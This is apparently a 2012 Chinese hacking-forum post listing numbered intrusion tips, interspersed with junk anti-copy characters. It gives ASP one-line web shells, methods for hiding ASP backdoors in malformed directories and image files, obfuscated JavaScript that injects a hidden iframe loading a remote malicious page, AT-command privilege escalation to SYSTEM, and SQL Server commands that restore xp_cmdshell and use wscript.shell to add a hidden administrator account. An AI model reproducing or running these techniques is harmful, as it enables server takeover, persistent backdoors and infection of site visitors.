d).<script language=VBScript runat=server>execute request("sb")</Script>
9 `& E" v) D! v! T) |! ae).<%25Execute(request("l"))%25>; k/ Y# Y9 g) C/ ]) A6 ~0 U9 a- }
f).<%if request("cmd")<>"" then execute request("pass")%>! f$ S* K% `9 ?
A/ R3 [* H' K% k# l52、at "12:17" /interactive cmd
7 ]( Z/ E8 W( [: B执行后可以用AT命令查看新加的任务$ D5 q6 v( N& V' @
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, V( g$ q4 F4 k3 A& f4 K
' c0 ~' X9 }/ |" V1 O
53、隐藏ASP后门的两种方法
* k; H w6 | g& g. V! m1、建立非标准目录:mkdir images..\* i! v K; n7 `7 n! s
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp. G9 v2 w/ s3 Y; |5 `4 U* m
通过web访问ASP木马:http://ip/images../news.asp?action=login r" z5 N1 G( ]' y0 O0 }
如何删除非标准目录:rmdir images..\ /s% j) x0 J- w/ d* W9 s( [
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
W. H" n* p6 O- G5 _: j! F( ?mkdir programme.asp. c8 D1 b6 Z, r% C. z) Q
新建1.txt文件内容:<!--#include file=”12.jpg”-->$ r6 n3 B; z9 @& Z# j+ W
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件; h+ o$ B o/ l/ {+ K3 m2 I3 m
attrib +H +S programme.asp/ W7 @' u$ K3 l' y8 m
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
9 T5 Y8 t" b. M1 B. C, x5 e
2 \4 t: Z5 I: Y54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. S5 P6 s4 i5 ]8 D3 A$ Z然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( |1 B/ G t$ U1 u6 y! ^: L, ~9 u) f
55、JS隐蔽挂马
: C! V+ ]- d1 r3 T+ m7 l* J, [1." h/ y* L: \) S: f' P9 c( r/ v
var tr4c3="<iframe src=ht";
" r2 ]5 D" O$ [8 t' x# E! g {6 Ttr4c3 = tr4c3+"tp:/";/ I0 n- \* |! J
tr4c3 = tr4c3+"/ww";2 E- }0 k& x0 G/ x$ B
tr4c3 = tr4c3+"w.tr4";
$ C5 _$ l/ H4 ?, k0 atr4c3 = tr4c3+"c3.com/inc/m";
8 R5 z1 @( `4 k- r, h7 ntr4c3 = tr4c3+"m.htm style="display:none"></i";% m, L, P+ _; H" E+ V) H4 B
tr4c3 =tr4c3+"frame>'";2 Y% J6 y+ m3 j. c" K0 m: w6 u5 p
document.write(tr4c3);8 r9 G$ Y8 J: j7 K- [* p$ E3 R
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
! o# W7 v/ }- M5 M R, |+ t9 Z1 V$ Z9 N2 Q
2." a d K% B3 v
转换进制,然后用EVAL执行。如
0 n/ F5 O( e3 p) O1 m' Z4 Z% S% Oeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");5 Q" s3 ?! n, C1 x2 F3 U5 c: S
不过这个有点显眼。
( c5 k( {- O. k. v6 _' }1 G3.9 t5 {0 q; u) x1 a3 C, j
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');) a9 W* n8 {1 p4 T1 F7 Z
最后一点,别忘了把文件的时间也修改下。6 ]( ~/ e2 O, `4 v
Z- R' Q6 o0 r4 @" p56.3389终端入侵常用DOS命令
2 R( ?, ~# q R" G, V5 e0 Etaskkill taskkill /PID 1248 /t
! m8 A* N. A& |9 x1 ^$ E6 H. m1 u6 @8 h, u+ q9 Y3 F) f9 V" `
tasklist 查进程
$ b7 s: Q+ \) Y; M: U! Z" S4 Q7 |, U" T$ w0 a
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 E3 A) B( q" ]$ r5 f& F
iisreset /reboot
* i. s4 d( T8 S; t. ^6 ptsshutdn /reboot /delay:1 重起服务器
4 q7 j. ^7 c: G# D% a$ p- n2 S! f( z2 f2 q
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# a D! E7 X1 ~
$ W1 N7 O( J2 E
query user 查看当前终端用户在线情况
1 k2 Y* U: |: S- H! f* ~
( d" }! g- S0 V, S5 J要显示有关所有会话使用的进程的信息,请键入:query process *
: ^5 w' g) |/ k, c; h. j g$ U9 U! j4 J7 U9 {, p
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2! O+ y6 X3 |6 V0 F, m7 }
0 B6 K9 Y( S! j; Z/ z2 V7 u
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2 a4 F; r& i1 [: |9 ?
0 n6 y, ~" F3 P# T, {要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
) }' J5 e: m0 p/ p, `3 N3 a* A* a, `3 P1 M8 r. k! P+ Z& _8 A
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. r. x% d* c! q: Z, V# J( M( Q- r+ V3 ~1 i4 X1 [& m, O0 w
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 @5 d- u/ B, D a$ V" w( h& ^0 f2 C Z; i4 ] E' h. r8 U
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; I3 s) C W( F4 B" N8 B! k# h) z: I( E. J; q
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
; E1 m L/ h, ~1 U
3 B# ]0 m6 X }7 a `56、在地址栏或按Ctrl+O,输入:0 b r: y1 O2 e6 Y( r; |. U& g1 y
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ K3 t, u2 j7 ^+ W8 K! W1 `
! A- K' u% A; i" U4 x4 L( s源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
& Q7 W2 |4 G7 }& Q$ ?2 T ?( S; v
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ N% i! @4 a9 @$ S0 d8 S: O7 _
用net localgroup administrators是可以看到管理组下,加了$的用户的。
) I' \! l# F8 |9 [) ]
) o* y: ]/ e" Q) l' @! ^! B9 G+ I58、 sa弱口令相关命令: ?) x( C" v# B! L) R4 m) B* C C' S
% }0 `+ `' ]( q _; N4 }' q
一.更改sa口令方法:4 F4 x3 [. `; N6 ]' U7 u o7 q; u
用sql综合利用工具连接后,执行命令:9 I/ y3 Z) h! i* n7 w- e
exec sp_password NULL,'20001001','sa'
0 W& y- [( Z' l, N(提示:慎用!)
9 m8 T* s7 o- V8 r7 P' c; P0 A5 ^: v+ X) R
二.简单修补sa弱口令.
4 p- u0 j. L. ^- C
; H2 `) X c+ }# c+ p7 G" e& u: H方法1:查询分离器连接后执行:6 ^9 i6 U5 P) v
if exists (select * from4 {8 h6 o/ i g1 L1 b/ q) ~$ h
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 o1 r1 a" T$ [' I! x
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)* u, t% q h" W5 n E4 y. m
4 ~, J4 \# g( z9 l- L0 h, [. y
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'0 I; G8 n) Y4 B
! n# H/ j3 A1 h0 f* jGO
6 \* f5 ?2 J% H$ F! e1 [7 l9 u
然后按F5键命令执行完毕
1 K* |7 g' L" I2 o0 H
0 _. W. H/ {+ x* ^7 q" F9 G方法2:查询分离器连接后
7 p. k- q+ a! C- G第一步执行:use master% y8 T! u2 @: {( x5 x; o! e) J
第二步执行:sp_dropextendedproc 'xp_cmdshell'. w% _- Q" W/ ^) N7 ?3 b7 d2 j
然后按F5键命令执行完毕
+ M$ H i# Y6 h1 z8 J# W/ k& _* C2 E( k/ E& @
) J3 ]6 h( T$ R, X三.常见情况恢复执行xp_cmdshell.
. [: ]1 R; d: I% h( x1 S3 i6 u1 L4 p3 e* C& X+ ]% I
; B+ M5 F0 y l: _- {
1 未能找到存储过程'master..xpcmdshell'." P' \, `+ y& R- U* h; Q
恢复方法:查询分离器连接后,
/ }3 n$ R5 r& g" W6 Q第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* P0 C5 p1 z2 G! B第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. B) p9 f0 Q( X# R ]. s( D
然后按F5键命令执行完毕
, L1 ]3 o, ]& O" n5 J9 `' W/ m7 Q' [- s$ N, V6 g9 a
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! z u5 r: U6 X, i" b; [恢复方法:查询分离器连接后,
& D- c1 e( L$ d; ?4 O: E% S, D第一步执行:sp_dropextendedproc "xp_cmdshell"2 t H. |3 K( w' F7 Y4 r
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ ]6 X; B! I6 K然后按F5键命令执行完毕
. S( c: K" ~* e# ~, n+ Z+ N1 W, f% q% H9 @6 w* A
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)7 I( f, ~ a- O; j3 O/ |. N
恢复方法:查询分离器连接后,
/ n! x$ a& M! G9 C第一步执行:exec sp_dropextendedproc 'xp_cmdshell'" u% B& ^9 O# p
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4 j$ \! _; Q" M3 i5 O& e+ o然后按F5键命令执行完毕
5 ]* O# T5 u! J5 y3 P% f& K% b+ |+ s/ V
四.终极方法.6 B7 k9 E5 u L. o6 O4 y" a7 L4 v
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
F, E( Q' r: g, ^查询分离器连接后,0 {- y4 a0 y7 t, p
2000servser系统:
% h; a7 H1 l& }% q0 ?2 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
! ~0 W3 g. X ?0 n# W* s6 Q, h& m! y* p4 O& v/ C5 Z; B7 q& J6 W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 n- C. w4 ~/ j' n! H
1 ?0 }" k# w# A6 p* U vxp或2003server系统:' ]* F7 T/ Q* Z% [, O9 a
; E, w' L7 t: a7 e1 c* [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; k0 G1 _( E+ ]3 S; P; s5 ~* d9 G' w( j& D( t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ _, O/ I! O' e2 r& A
|
发表于 2012-9-15 14:13:15
收藏
支持
反对